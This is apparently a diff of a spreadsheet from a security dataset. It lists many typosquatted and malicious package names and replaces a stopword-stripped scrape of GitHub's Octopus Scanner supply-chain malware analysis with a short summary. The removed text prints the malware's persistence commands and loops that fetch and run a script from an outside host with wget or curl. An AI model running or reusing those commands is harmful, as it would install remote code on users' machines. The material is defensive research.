'pluginproposallogicalassignmentoperator', 'pluginproposaloptionalchaining', 'pluginproposalprivatemethod', 'pluginproposalunicodepropertyregex', 'pluginreplace', 'pluginrestendpointmethod', 'pluginsyntaxasyncgenerator', 'pluginsyntaxbigint', 'pluginsyntaxclasspropertie', 'pluginsyntaxclassstaticblock', 'pluginsyntaxdecorator', 'pluginsyntaxflow', 'pluginsyntaximportmeta', 'pluginsyntaxjsonstring', 'pluginsyntaxprivatepropertyinobject', 'pluginsyntaxtoplevelawait', 'pluginsyntaxtypescript', 'plugintransformarrowfunction', 'plugintransformasynctogenerator', 'plugintransformblockscopedfunction', 'plugintransformblockscoping', 'plugintransformclasse', 'plugintransformdotallregex', 'plugintransformflowstriptype', 'plugintransformfunctionname', 'plugintransformliteral', 'plugintransformmemberexpressionliteral', 'plugintransformmodulesamd', 'plugintransformmodulessystemj', 'plugintransformmodulesumd', 'plugintransformnewtarget', 'plugintransformparameter', 'plugintransformreactconstantelement', 'plugintransformreactdisplayname', 'plugintransformreactpureannotation', 'plugintransformregenerator', 'plugintransformreservedword', 'plugintransformruntime', 'plugintransformshorthandpropertie', 'pluginutil', 'plutovslackclient', 'pmcontrol', 'precodejs', 'prereleaseidfromversion', 'prerequestsxcode', 'presentationalcomponent', 'presetflow', 'presetmodule', 'prettierplugincadl', 'proctitle', 'proxyj', 'purviewadministrationr', 'purviewcatalog', 'purviewcatalogr', 'purviewscanningrest', 'pyramidproportion', 'rcaddin', 'rdocumentationapp', 'rdocumentationworker', 'readprojectmanif', 'regressiont', 'relaycompilerplaygroundtest', 'requesterror', 'requesterbrowserxhr', 'requestercommon', 'requesternodehttp', 'requireobjectcoercible', 'requireport', 'restapispecsscript', 'restaurantapproval', 'richdocument', 'rigpackage', 'rimrafdir', 'ringcentralapisample', 'ringcentralembeddable', 'ringcentralembeddablercvdemo', 'ringcentraljavascript', 'ringcentraljs', 'ringcentraljswidget', 'ringcentralmediaplayer', 'ringpopui', 'rocketmqsite', 'runtimelimiter', 'rushlib', 'rushprettier', 'rushsdk', 'samplesbootstraptheme', 'scroool', 'semanticconvention', 'sequelizeorm', 'serotonine320', 'serverbeat', 'servicebustrack1', 'servicebusv7', 'servicebusv9', 'setspecie', 'settingregistry', 'shadowsock', 'sheincomponent', 'sinonjsfaketimer', 'socketioclientv2', 'sonatype', 'sonulindu', 'spectralfunction', 'spectralparser', 'spectralrulesetmigrator', 'spectralruleset', 'sqlitejs', 'sqliter', 'stautse', 'storageblobchangefeed', 'storageinternalavro', 'storagequeue', 'streamcollator', 'synapseaccesscontrolr', 'synapseartifact', 'synapsemanagedprivateendpoint', 'synapsespark', 'ta123123', 'teamcitybuildartifact', 'teamcityinvestigation', 'teamcityvscodeextension', 'tensorplow', 'testcredential', 'testinglibraryreact', 'toindexedobject', 'toprimitive', 'tostringtagsupport', 'toolcache', 'trafficreport', 'transformgeojson', 'transformvdom', 'transformvega', 'twing22', 'universaltoken', 'upholdauthorizationcodeoauth', 'upholdclientcredentialsoauth', 'validateorder', 'vilaot', 'vscodenpmscript', 'waferform', 'wafergeolocation', 'waffles2presentation', 'wastprinter', 'webpubsubexpress', 'webtype', 'webworkerst', 'woocartexpiration', 'woointerestinproduct', 'wpcalypso', 'wrappedwellknownsymbol', 'writeprojectmanifest', 'youtrackactivitieswidget', 'youtrackboardstatuswidget', 'youtrackexportableworkitemswidget', 'youtrackissueslistwidget', 'youtrackpersonaltimetrackingwidget', 'youtrackreportswidget', 'pypi', '1337xx', '1337z', 'activedevbadge', 'adosint', 'adrandom', 'advencedrequest', 'aidocconsul', 'aioconsol', 'aiogramtype', 'aiohttpproxie', 'antchainsdkcommercial', 'antchainsdkcommercialexternal', 'antchainsdkmytc', 'arubomber', 'asteroidfilterbank', 'asynciobox', 'asyncoi', 'atplotlib', 'awslogin0tool', 'awscl', 'azureclimlprivatepreview', 'azuresdktool', 'azuremlcontriboptimization', 'baeutifulsoup', 'calculator2c397c49ab20c445', 'cashappmoneygenerator2022updatedfreecashapphacknoverification2j6z7gf', 'cashappmoneygenerator2022updatedfreecashapphacknoverification7zc4vo', 'ciscosparksdk', 'citscapesscript', 'cnscode', 'coinmarketcap', 'cryptfoeed', 'cryptodatafetch', 'cryptogetprice', 'cryptoo', 'cryptobalance', 'ctfq21empiretmp1337thc', 'dataclassespythonversion', 'dbcounter', 'debrickedt', 'deeptranslate', 'deeptranslation', 'deepmountainslrce', 'deepmountainslrce', 'deepmountainsrce', 'deepmountainswrce', 'dequest', 'discordppy', 'discordwbehook', 'discordwebbhook', 'discordwebhhook', 'discordwebhok', 'discordweebhook', 'discordwehbook', 'discordwehook', 'discordwwebhook', 'discordy', 'discordpt', 'dppclient', 'dppclient', 'dpybot', 'drawtime', 'drgntokenization', 'ebsocket', 'equest', 'esqadhackedosint', 'esqadintellgtb', 'esqccpullvirtual', 'esqcraftvirtual', 'esqcvcpupy', 'esqcvinfogrand', 'esqcvlgtbhydra', 'esqencodereplaceproof', 'esqgameguiintel', 'esqgameloadrandom', 'esqgamestringvm', 'esqhydraramhydra', 'esqintstudyhacked', 'esqmaskpepget', 'esqmcget', 'esqminead', 'esqminepysuper', 'esqnvidiamaskvirtual', 'esqnvidiavmget', 'esqosintvisaget', 'esqpaypalinfogui', 'esqpaypalvisaencode', 'esqpepintpyw', 'esqproofrandommine', 'esqpushhttp', 'esqstringtoolint', 'esqurlencodead', 'etnsorflow', 'ewbsocketclient', 'exotel', 'ezbeamer', 'ezbeamsw', 'fatnoob', 'fdkit', 'ffreqtrade', 'firefoxupdate', 'firstbasicpyapp', 'flake7', 'freenetvpn2', 'fuzzzywuzzy', 'fxzontop', 'fyinance', 'guihydra', 'guipep', 'httpxgett', 'httpxmodifi', 'ipboard', 'ipllow', 'linkedinscrape', 'mandacvsecureit', 'mandatucvasecureit', 'mcstring', 'mokc', 'monkeytype', 'mxnetcuxxx', 'nagogy', 'navigatorupdatert', 'newreque20222', 'newrequ', 'newrequest2022', 'newurllib', 'oaijwdoijwaoj', 'osintrand', 'otrutil', 'owlmoon', 'oxeru1', 'oxeru2', 'oxeru3t', 'pandarequ', 'panderequest', 'pandsa', 'paypalcpu', 'paypalotpbypass', 'pcodestyle', 'pippytest', 'pllow', 'ploghandle', 'pluginlibrary', 'pluto', 'poiqweconnector', 'pompttoolkit', 'ppygame', 'ppysock', 'printf', 'privatelibrarydontinstall', 'prmopttoolkit', 'prmpttoolkit', 'progreessbar2', 'progresbsar2', 'progressar2', 'progressbaar2', 'progressbarr2', 'progressbbar2', 'progressbr2', 'progresssbar2', 'progrressbar2', 'progrsesbar2', 'progrssbar2', 'promppttoolkit', 'promptoolkit', 'promptotolkit', 'prompttolkit', 'prompttolokit', 'promttoolkit', 'proofsuper', 'proompttoolkit', 'propmttoolkit', 'proxycrape', 'prrompttoolkit', 'psock', 'ptorch', 'ptyhonbinance', 'ptyorch', 'pullpaypal', 'pvhttp', 'pyccmcstudy', 'pyguipaypal', 'pyhackedgrandproof', 'pyhackedreplace', 'pyhttpkill', 'pyhttpreplacerand', 'pyhydrapy', 'pyhydraurlstudy', 'pyintelget', 'pymcultracraft', 'pymcvirtualpy', 'pyminemaskget', 'pynvidiarandvirtual', 'pyosintpep', 'pyosintsuperintel', 'pypeppy', 'pypeprandcandy', 'pypinggrandnvidia', 'pypongpep', 'pyproofmine', 'pysplitvercraft', 'pystrcvkill', 'pystringlib', 'pystringpostmc', 'pystrmaskmine', 'pystudyedstr', 'pystudynvidiamc', 'pystudypush', 'pystudytoolping', 'pytoolreplacelib', 'pyultraproofinfo', 'pyultrarandom', 'pyvercraftget', 'pyconaufuntime', 'pycryptexe', 'pycryptodome', 'pycryptography', 'pydefender', 'pydesing', 'pyevasive', 'pyezstyle', 'pyfilget', 'pygutil', 'pyhint', 'pyiinstaller', 'pyinsaller', 'pyinstaaller', 'pyinstaler', 'pyosck', 'pyprotector', 'pysck', 'pythonbbinance', 'pythonbiance', 'pythonbiannce', 'pythonbinaance', 'pythonbinace', 'pythonbinnance', 'pythonbinnce', 'pythonarg', 'pywin33', 'r4quest', 'ramcc', 'rampush', 'randget', 'rawrequ', 'rblxtool', 'rdquest', 'redist', 'reduest', 'reequeststoolbelt', 'reeuest', 'replacead', 'reqtool', 'reqeststoolbelt', 'reqeuststoolbelt', 'reqkest', 'requst', 'requesrs', 'requess', 'requesstoolbelt', 'requesst', 'request', 'requeststolobelt', 'requeststoobelt', 'requeststoolbbelt', 'requeststoollbelt', 'requeststooolbelt', 'requestt', 'requfst', 'requiest', 'requist', 'requset', 'requset', 'requst', 'requste', 'requststoolbelt', 'requuest', 'resplit', 'resuest', 'rfeqtrade', 'rfquest', 'ripeatlasdyndns', 'roblcxcookie3', 'robonotif', 'rompttoolkit', 'rqeuest', 'rrequeststoolbelt', 'rrquest', 'rullib3', 'rwquest', 's3tranfer', 's3trnasfer', 's3trnasfer', 'safepackage', 'sagepay', 'salamus7', 'saturnian', 'sccikitlearn', 'scikitlaern', 'scrappersdev', 'seabron', 'selfadmaskmask', 'selfbotapi22', 'selfhackedccpull', 'selfhttppep', 'selfhttppy', 'selfintstringpong', 'selfintsuper', 'selfinturlstudy', 'selfintvisa', 'selfkillcontrol', 'selfponggui', 'selfpyverint', 'selfpywgetget', 'selfpywhydragui', 'selfpywloadpong', 'selfpywreplace', 'selframstudyget', 'selfsupergameencode', 'selfsuperstrpaypal', 'selfultravirtual', 'selfvergame', 'selfvergui', 'sintaxisoyyo', 'siplejson', 'srvconfig', 'strhydra', 'stringe', 'stringintel', 'stringultra', 'strpull', 'strreplace', 'synthetictest', 'teleportclient', 'tennsorflow', 'tenorflow', 'tenosrflow', 'tensofrlow', 'tensorfolw', 'tequest', 'tesoaoerm', 'tessssssssss', 'testasync', 'testinglmao123', 'testomadaoto', 'testpipper', 'testpipperz', 'testwhitesnake', 'testwhitesnake123a', 'testwhitesnakemodule', 'tgbulksender', 'threadin', 'tinyad1', 'tinyad2', 'tlsbypass', 'tlspython', 'tnesorflow', 'tnsorflow', 'tpcontrolsplit', 'tpcraftcandy', 'tpcvadlib', 'tpcvpygui', 'tphackedsplitcraft', 'tphydraencode', 'tphydramask', 'tphydratoolsplit', 'tplibinfo', 'tploadget', 'tploadreplace', 'tploadreplacestring', 'tppaypalver', 'tprandcandy', 'tprecandy', 'tpreplacegrandrandom', 'tpstudyproofhttp', 'tpstudyvirtual', 'tpurlguiint', 'tpvercontrol', 'tpvirtualhttp', 'trexcolor', 'typingextnesion', 'u283udsfru', 'ulrlib3', 'ultracv', 'ultraobfuscator', 'ultraproof', 'ultrarequest', 'updlibupload', 'upgraderequest', 'urlib3', 'urlli3b', 'urllib', 'urllib3installer', 'urllib3loader', 'urllibb3', 'urllibdownloader', 'urllibinstaller', 'useragentclient', 'uurllib3', 'uzzywuzzy', 'v4pe', 'value2', 'visavirtual', 'vmconnect', 'vper', 'wbesocket', 'wbsocketclient', 'webrequestsautmoation', 'webbsocketclient', 'webocketclient', 'weboscket', 'webscoketclient', 'websoccketclient', 'websoccket', 'websockeet', 'websocke', 'websocketcclient', 'websocketclinet', 'websocketclint', 'websocketcllient', 'websocketlcient', 'websokcetclient', 'websoket', 'websoocket', 'webssocketclient', 'weebsocketclient', 'weg3', 'wesbocketclient', 'wesbocket', 'yfiannce', 'yfiinance', 'ypthonbinance', 'ysock', 'a1447llminit', 'a1447llt', 'a1508kiika', 'a1510jybmi', 'a1548syyamamoto', 'a15z8myname', 'a1630tya1630ty', 'abbishsequelplugin', 'abbreviatedmethod', 'abilityengine', 'acceptsnestedserializedattribute', 'accesspolicyrail', 'aceclientext', 'achclient', 'ackintoshnetemptyport', 'acmeclient', 'acmesmithns1', 'acpcpokertype', 'acpcpokermatchstate', 'acpcpokertype', 'actasenumerable', 'actasserializable', 'actbluereporter', 'actionmailercachedelivery', 'actionmetatag', 'actionmailerlocalizedpreview', 'actionviewlinktoblock', 'activeadminduplicatable', 'activeadminfiltersvisibility', 'activeadmintheme', 'activeapplication', 'activecomparisonvalidator', 'activemodelpermalink', 'activemodelpolicy', 'activemodelpolicy', 'activemodelversionserializer', 'activepress', 'activepublicresource', 'activerecordfixintegerlimit', 'activeadminsearchableselect', 'activeadminglobalize3input', 'activemodelemailaddressvalidator', 'activemodelimmutablevalidator', 'activemodelipaddrvalidator', 'activemodelurlvalidator', 'activemodelvalidator', 'activerecorddatabasevalidation', 'activerecordsafeinitialize', 'activerecordserializecoder', 'activerecordstrictvalidation', 'activerecordsuppressrangeerror', 'activerecorddatabasevalidation', 'activerecorddbtool', 'activerecordduplicate', 'activerecordimplicitorder', 'activerecordjdbcspliceadapter', 'activerecordlike', 'activerecordlockingsymbolic', 'activerecordpostgresqlexpression', 'activerecordpublishable', 'actsasbettertree', 'actsascommentablewithreplie', 'actsasexplorable', 'actsasjournalized', 'actsaskeywordable', 'actsaslikeable', 'actsaslistwithstisupport', 'actsasmultilingual', 'actsaspublicable', 'actsaspublishable', 'actsasreadonlyi18nlocalised', 'actsassplittable', 'actsassubscribable', 'adsearch', 'adbsdklib', 'addonsclient', 'addressvalidate', 'addressvalidator', 'admobsitestat', 'adncli', 'adtechapiclient', 'adyenrubyapilibrary', 'aevalidatestimeliness', 'aemdeploy', 'afterthedeadline', 'agaveclient', 'agevalidator', 'airbrakestat', 'airbrakestatsd', 'akercascli', 'alephantpublisherqueue', 'alephantpublisherrequest', 'alertypluginamazonsns', 'alertyplugindatadogevent', 'alertyplugindatadogevent', 'alexaplugingenerator', 'algoliaplace', 'alimns', 'aliasclass', 'aliashelper', 'aliasmetric', 'alignedtable', 'alipayescrow', 'alipayglobal', 'aliseeksapi', 'aliyunlive', 'aliyunmn', 'allqclient', 'allscriptsunityclient', 'alohaanalyser', 'alphabetrocker', 'alphabeticpaginate', 'alphabeticalpaginate', 'alphabeticalpaginateuk', 'amavalidator', 'androidpublisher', 'angellist', 'angularformvalidation', 'angularfileuploadrail', 'ansibletowerclient', 'answersrubyclient', 'anyvalidate', 'anythingsliderrail', 'anythingslider', 'apachefelixapiclient', 'apideploy', 'apibancaclient', 'apidoneclient', 'apigeecli', 'apioticsawsclient', 'apioticsawsiotclient', 'apitoolclient', 'apnclient', 'apodcli', 'appcli', 'appdeployer', 'appleclassclient', 'appledepclient', 'applicationmodule', 'applicationseed', 'appliciousutil', 'applidgetoauth2', 'apressmoysklad', 'apressvalidator', 'arfindinbatcheswithorder', 'arserializehelper', 'archiveuploader', 'ardmsqliteadapter', 'argentinianvalidation', 'assetpipelinei18n', 'assetsymlink', 'asteriskariclient', 'astroboacli', 'atleastoneexistencevalidator', 'atvalidation', 'atlasclient', 'atlassianplugininstaller', 'attrvalidator', 'attributenormalizerextras', 'audiomixersox', 'audiobankclient', 'authclient', 'authtransisclient', 'authenticatedclient', 'autoscalingmethod', 'autovalidate', 'autoprojstat', 'awssnssubscription', 'backstopdeploy', 'barometerweatherbug', 'basicstat', 'bbsuploader', 'betainvite', 'binarysearchtree', 'branchraker', 'cachestat', 'capistranostat', 'chalkrake', 'chefpartialsearch', 'colourful', 'colourize', 'comicvine', 'commonmarkerpluggable', 'cordovarake', 'crlwatchdog', 'dangerapkstat', 'datadognotification', 'delayedpluginsairbrake', 'derivinglicense', 'devinosm', 'dogehelper', 'dogelinguist', 'dtrake', 'ebayclient', 'ebayenterpriseaffiliatenetwork', 'firstgivingapi', 'fluentpluginhaproxystat', 'fluentpluginairbrakepython', 'fluentplugincloudwatchlogsfoxtrot9', 'fluentpluginstatsdoutput', 'fluentpluginstatsite', 'fontawesomesass', 'fontstack', 'footstat', 'gameshufflecard', 'getstat', 'gettext', 'gettext', 'gimmevin', 'githuborgstat', 'githubreleasestat', 'hackcard', 'halostat', 'haslog', 'jekyllrplog', 'litaonewheelbeergrowler', 'litaonewheelbeerpint', 'livingdead', 'logginglogstash', 'logstf', 'logsviewer', 'logsvisualizer', 'logstashcodecavroschemaregistry', 'logstashcodeccloudtrail', 'movingimage', 'movingword', 'piratebayapi', 'rackenvinspector', 'referralcandy', 'resquestuckqueue', 'restclient', 'rubynmap', 'rubyloveplayingcard', 'seleniumspider', 'spidergazelle', 'wordifystuckiest', 'workareagiftcard']</t>
         </is>
       </c>
     </row>
@@ -4095,17 +3544,13 @@
       </c>
       <c r="C141" t="inlineStr">
         <is>
-          <t>skip content back githubcom bounties research advisories codeql wall fame involved events home bounties research advisories codeql wall fame involved events octopus scanner malware attacking open source supply chain alvaro munoz securing open source supply chain enormous task goes beyond assessment patching latest cves supply chain integrity entire software development delivery ecosystem code commits flow cicd pipeline actual delivery releases there’s potential loss integrity concerns throughout entire lifecycle past years open source supply chain experienced variety attacks developer credential hijacks aimed introducing backdoors like event stream incident seemingly nonstop stream typosquatting attacks popular package managers pypi sometimes something innocent misinterpreted warning make developer comment single line dramatic effect line backdoor typo often hard differentiate often circumstances commit commit clear indication intent blatantly build pipelines also actively compromised like webmin incident historical examples include making backdoored toolchains available download introduce backdoors compiled code like infamous malicious xcode incident march received message researcher informing githubhosted repositories presumably unintentionally actively serving malware deepdive analysis malware uncovered something seen platform malware designed enumerate backdoor netbeans projects uses build process resulting artifacts spread course investigation uncovered open source projects backdoored malware actively serving backdoored code story octopus scanner supply chain malware octopus scanner github’s incident response team sirt received initial notification repositories serving malwareinfected open source projects researcher sirt routinely receives triages reports actors abusing github repositories actively host malware attempting github platform part command control infrastructure report different owners repositories completely unaware committing backdoored code repositories provided great level detail repositories vulnerable well highlevel description malware dubbed “octopus scanner” actually noted malware capable identifying netbeans project files embedding malicious payload project files build files high evel description octopus scanner operation identify user’s netbeans directory enumerate projects netbeans directory copy malicious payload cachedat nbprojectcachedat modify nbprojectbuildimplxml file make sure malicious payload executed every time netbeans project build malicious payload instance octopus scanner newly built file also infected even though malware servers didn’t seem active time analysis affected repositories still posed risk github users could potentially clone build projects unlike github platform abuse cases repository owners likely completely unaware malicious activity therefore swiftly blocking banning maintainers option sirt github conducted investigation malware figure spreading importantly properly remove infected repositories without shut user accounts infection details described user infected octopus scanner went search indications netbeans developer system wasn’t case wouldn’t take actions however found malware would proceed backdoor netbeans project builds following mechanisms makes sure every time project built resulting files infected socalled dropper dropper mechanism “drops” something filesystem execute executed dropper payload ensured local system persistence would subsequently spawn remote administration tool connects servers tries prevent project builds replacing infected ensure malicious build artifacts remained place initially planned contact owners infected repositories send pull request delete nbprojectcachedat clean nbprojectbuildimplxml files expectation might enough clean repositories wouldn’t resolve local infections affected developers would halt active spread github platform developers addressed local platform however deeper analysis malware proved wrong simple steps wouldn’t sufficient since malware also infected files available project dependencies—not necessarily build artifacts even though could access sample octopus scanner build infecter reviewing infected repositories found four different versions infected netbeans projects downstream system example someone cloned infected project would infected either building infected repository using tainted artifacts resulted infected build variant would perform local system infection leave build artifacts untouched technical analysis started analysis sample octopus scanner malware without taking account initial infection vectors virustotal dashboard malware detection rate could easily unnoticed virustotal httpswwwvirustotalcomguifilebe8d29f95a9626e2476a74f895743f54451014aab62840770e4f9704980b0ac6details detection rate first submission latest contents modification following diagram shows different parts malware malware disguises ocstxt file easily determine actually java archive file nbprojectmalwaresamples master file ocstxt ocstxtjar archive data least extract nbprojectmalwaresamples master binwalk ocstxt decimal hexadecimal description archive data least extract compressed size uncompressed size name metainfmanifestmf 0x96 archive data least extract compressed size uncompressed size name octopussetupoctopussetupclass 0x721 archive data least extract compressed size uncompressed size name resourcesoctopusdat 0x3de17 archive footer length manifest first stage dropper shows octopussetupoctopussetupmain method runs entry method drops second stage payload victim system unixlike systems first stage dropper perform following steps extract second stage payload octopusdat homelocalshareocto create homeconfigautostartoctodesktop following contents usrbinenv xdgopen desktop entry typeapplication nameautoupdates execbinsh java homelocalshareocto auto starts second stage payload desktop session user malware uses file system separator decide proceed note treats linux macos infection works linux systems windows systems extracts second stage payload octopusdat tempmicrosoftcache134dat runs schtasks create logsprovider javaw tempmicrosoftcache134dat minute schedule task runs schtasks logsprovider actually spawn scheduled task interesting part malware exists second stage payload octopusdat infer gets executed another java file infecting netbeans build octopusdat payload binary actually performs netbeans build infections virustotal httpswwwvirustotalcomguifile48bd318d828ac2541c9495d1864ac1fa3bb12806fb1796aa58b94a69b9a7066ddetection detection rate first submission latest contents modification sample analyzing belongs version malware versioning scheme indication malware developed structured take closer look octopusoctopusscannermain method perform following actions scan appdatanetbeans homenetbeans configpreferencesorgnetbeansmodulesprojectuiproperties files files contain information netbeans projects available system search projectuiproperties openprojectsurlsxxx entries entries represent netbeans projects file uris infect netbeans project project found malware infect dropping innocentlooking file called cachedat projectnbproject modifying projectnbprojectbuildimplxml cachedat executed part build process netbeans project build consists multiple steps octopus scanner malware interested prejar postjar tasks prejar tasks provide hooks build point java classes compiled zipped final artifact postjar tasks provide hooks build point actually created order access build hooks malware search following entries target name prejar empty placeholder easier customization override target buildxml file target target name postjar empty placeholder easier customization override target buildxml file target prejar hooks inject java subtask execute cachedat infecter every class added file target name prejar empty placeholder easier customization override target buildxml file java nbprojectcachedat failonerror false value prejar value buildclassesdir java target postjar hooks also cachedat different arguments target name postjar empty placeholder easier customization override target buildxml file java nbprojectcachedat failonerror false value postjar value buildclassesdir java target cachedat responsible backdooring built classes classes executed infect underlying system detail previously mentioned analysis found octopus scanner stop also scans project directory files backdoors similar cachedat infects built classes last step makes difficult automatically clean infected repositories cannot delete files since likely required dependencies project infecting system point infection chain malware able infect build artifacts well project dependencies drop files persist underlying system actual system infection process carried cachedat biologic viruses malware attempts spread broadly possible infecting systems already infected would moot infecting build artifacts means infect hosts since infected project likely built systems build artifacts probably loaded executed systems well know life always finds way—even virulent digital life since malware sample uses hardcoded name first stage dropper cachedat always placed static location projectnbproject able query github repositories infected projects known variants malware able harvest four different samples malware rwrr pwntester staff cachedat18107f2a3e8c7c03cc4d7ada8ed29401 rwrr pwntester staff cachedataea4ce82d4207d2e137a685a7379f730 rwrr pwntester staff cachedatbcb745a7dae7c5f85d07b7e9c19d030a rwrr pwntester staff cachedatdc2e53334b6f20192e2c90c2c628e07a note first sample completely different size it’s safe assume sample stand crowd samples minor differences let’s verify analysis sample 18107f2a3e8c7c03cc4d7ada8ed29401 virustotal httpswwwvirustotalcomguifile13e1f2716a0827b3f8933069319e08d07ea2b949141151a639dd2aef10d81985detection detection rate first submission earliest contents modification probably earliest first version malware since version infect classes file built instead infects system directly therefore version spread tainted repository cloning building samples also spread resulting build artifacts loaded used therefore particular version malware backdooring build classes diagram slightly different unixlike systems drop following files homelibrarylaunchagentsautoupdaterdat java file runs fenmainmain method turn downloads installs ratlike tool httpeccfreeddnsorgdatatxt httpsanstranglednetstat downloaded instance feimea portable analyzed blog post homelocalsharebbauto autoupdaterdat homelibrarylaunchagentsautoupdaterplist autolauncher runs autoupdaterdat dropper running java homelibrarylaunchagentsautoupdaterdat homeconfigautostartnonedesktop autolauncher launches bbauto dropper running binsh java homelocalsharebbauto homeconfigautostartdesktop file binsh truedo wget httpelnduckdnsorgse shsleep 60done basically script provided homelibrarylaunchagentssoftwaresyncplist similar step runs truedo curl httpelnduckdnsorgse shsleep 60done note explicit support macos specific launch paths well xdg’s config mechanism popular many linux distributions windows system drop dropper tempmicrosoftexplorersyncdb autoupdaterdat unix systems java reflection dropper schtasks create explorersync javaw tempmicrosoftexplorersyncdb minute aea4ce82d4207d2e137a685a7379f730 virustotal httpswwwvirustotalcomguifilea7d664bff764bfc2cc6b13c15b2d7d7f09d0e55f0c376a81b64644d85ebe1e0bdetection detection rate first submission earliest contents modification version malware executes stages netbeans build prejar postjar prejar task responsible infecting classes jarred infection essentially replicate hidden dropper classes executed infect system dropping files dropped directly 18107f2a3e8c7c03cc4d7ada8ed29401 sample postjar task create empty files netbeansautomaticbuild netbeansupdateresources files markers denoting contents build uptodate state bypasses compileonsave mechanism prevent project rebuilds bcb745a7dae7c5f85d07b7e9c19d030a virustotal httpswwwvirustotalcomguifile5d49b3a1906167c31a2fb41b6ce65c030a8b5a84c33401bbac4b718b015c9db7details detection rate first submission earliest contents modification version probably earlier version aea4ce82d4207d2e137a685a7379f730 main difference name dropped files homelibrarylaunchagentsmainclass instead homelibrarylaunchagentsautoupdaterdat homelocalsharemainclass instead homelocalsharebbauto dc2e53334b6f20192e2c90c2c628e07a virustotal httpswwwvirustotalcomguifile01e28d963036b05a26773c2679cfe7b04ffd6dd56506630e7e19a29a2d1e6aeedetection detection rate first submission earliest contents modification version practically identical bcb745a7dae7c5f85d07b7e9c19d030a likely minor release reduce hashbased detection making minor changes build artifacts malware authors throw hashbased detection many engines solutions rely deobfuscating malware running strings command cachedat backdoored classes render interesting analysis malware samples actively obfuscate code make harder specifically droppers sample combine three different data blobs bytes singleencrypted data blob chaining methods public static void a447410325 throws exception class var0 class forname thread currentthread getstacktrace getclassname system arraycopy byte byte var0 getfield object null var0 getmethod a1009916519 invoke object null blob’s reconstruction decrypts encrypted blob following routine public static void a1009916519 throws exception class var0 class forname thread currentthread getstacktrace getclassname byte var3 byte class forname thread currentthread getstacktrace getclassname getfield object null var1 var2 var1 var1 var2 var2 var2 var3 var1 byte var3 var1 var3 var1 var2 var2 var3 var1 byte var3 var1 var3 var1 var2 var3 var1 byte var3 var1 var3 var1 var3 var1 var3 var1 byte var3 var1 var3 var1 var2 var3 var1 byte var3 var1 var3 var1 var3 var1 var3 var1 able access decrypted data give good idea malware actually order data right gets decrypted used java instrumentation agent modifies bytecode class responsible decrypting blob right actually gets loaded writing classfiletransformer using bytecode manipulation library javassist bytebuddy inject analysis code classpool classpool getdefault class ctclass decryption method ctmethod getdeclaredmethod a1009916519 inject code dump thisa string endblock orgapachecommonsiofileutilswritebytearraytofilenew javaiofiletmpmemorydump byte classfornamethreadcurrentthreadgetstacktrace1getclassnamegetfieldagetnull insertafter endblock bytecode tobytecode detach inspecting tmpmemorydump file obtain much clearer understanding malware another useful transformation analysis involves modifying javaiofileoutputstream constructor capture names files dropper question writing finaltargetclassname equals javaiofileoutputstream system println classname classpool classpool getdefault ctclass targetclassname ctconstructor ctors getdeclaredconstructors ctconstructor ctor ctors ctor insertbefore systemoutprintlnjavalangstringvalueofargs0 bytecode tobytecode detach system println agent class successfully modified catch exception system println getmessage printstacktrace provides good understanding files malware initially trying access pwntesterpwnlabworkspaceoctopusanalysisjavaagent java javaagent dumper10snapshotjarwithdependenciesjar test registering transformer javaiofileoutputstream agent transforming class javaiofileoutputstream javaiofileoutputstream agent class successfully modified dumping javaiofileoutputstream homepwntesterconfigautostartdesktop homepwntesterconfigautostartnonedesktop homepwntesterlocalsharemainclass homepwntesterlibrarylaunchagentssoftwaresyncplist homepwntesterlibrarylaunchagentsautoupdaterplist homepwntesterlibrarylaunchagentsmainclass conclusions seen many cases software supply chain compromised hijacking developer credentials typosquatting popular package names malware abuses build process resulting artifacts spread interesting concerning multiple reasons context gives malware effective means transmission since affected projects presumably cloned forked used potentially many different systems actual artifacts builds spread even disconnected original build process harder track fact since primaryinfected users developers access gained high interest attackers since developers generally access additional projects production environments database passwords critical assets huge potential escalation access core attacker objective cases interesting malware attacked netbeans build process specifically since common java today malware developers took time implement malware specifically netbeans means could either targeted attack already implemented malware build systems make msbuild gradle others well spreading unnoticed infecting build processes certainly idea seeing actively deployed used wild certainly disturbing trend github continuously thinking ways improve integrity supply chain includes features help detect issues dependencies using dependency graph alerts vulnerable dependencies automated updates features help detect potential issues code including code scanning secret scanning course maintain active response channel research capability github sirt github well initiatives open source coalition thanks dfirit anticomputer jayswan nicowaisman swannysec contribution research blog post product features enterprise customer stories pricing resources platform developer partners atom electron github desktop support docs community forum professional services status contact github company blog careers press shop github terms privacy cookie settings</t>
+          <t>Github was hosting the Octopus Scanner malware designed to enumerate and backdoor NetBeans projects, and which uses the build process and its resulting artifacts to spread itself.
+In the course of our investigation we uncovered 26 open source projects that were backdoored by this malware and that were actively serving backdoored code.</t>
         </is>
       </c>
       <c r="D141" t="inlineStr">
         <is>
           <t>https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain</t>
-        </is>
-      </c>
-      <c r="E141" t="inlineStr">
-        <is>
-          <t>['content', 'research', 'advisory', 'event', 'home', 'bounty', 'research', 'advisory', 'event', 'octopus', 'scanner', 'malware', 'open', 'source', 'supply', 'chain', 'alvaro', 'munoz', 'open', 'source', 'supply', 'chain', 'enormous', 'task', 'assessment', 'late', 'cf', 'chain', 'integrity', 'entire', 'software', 'development', 'delivery', 'ecosystem', 'code', 'flow', 'pipeline', 'actual', 'delivery', 'release', 'potential', 'loss', 'integrity', 'concern', 'entire', 'lifecycle', 'past', 'year', 'open', 'source', 'supply', 'chain', 'variety', 'attack', 'developer', 'credential', 'hijack', 'backdoor', 'event', 'stream', 'incident', 'nonstop', 'stream', 'typosquatting', 'attack', 'popular', 'package', 'manager', 'pypi', 'innocent', 'misinterpreted', 'warning', 'developer', 'single', 'line', 'dramatic', 'effect', 'line', 'backdoor', 'circumstance', 'clear', 'indication', 'intent', 'pipeline', 'webmin', 'incident', 'historical', 'example', 'backdoored', 'toolchain', 'available', 'download', 'backdoor', 'code', 'infamous', 'malicious', 'incident', 'message', 'researcher', 'repository', 'malware', 'deepdive', 'analysis', 'malware', 'platform', 'malware', 'backdoor', 'netbean', 'project', 'build', 'process', 'artifact', 'course', 'investigation', 'open', 'source', 'project', 'malware', 'code', 'story', 'octopus', 'scanner', 'supply', 'chain', 'malware', 'scanner', 'incident', 'response', 'team', 'initial', 'notification', 'repository', 'open', 'source', 'project', 'researcher', 'triage', 'report', 'actor', 'repository', 'platform', 'command', 'control', 'infrastructure', 'report', 'different', 'owner', 'repository', 'unaware', 'code', 'repository', 'great', 'level', 'detail', 'repository', 'vulnerable', 'well', 'highlevel', 'description', 'malware', 'octopus', 'scanner', 'malware', 'capable', 'netbean', 'project', 'file', 'malicious', 'payload', 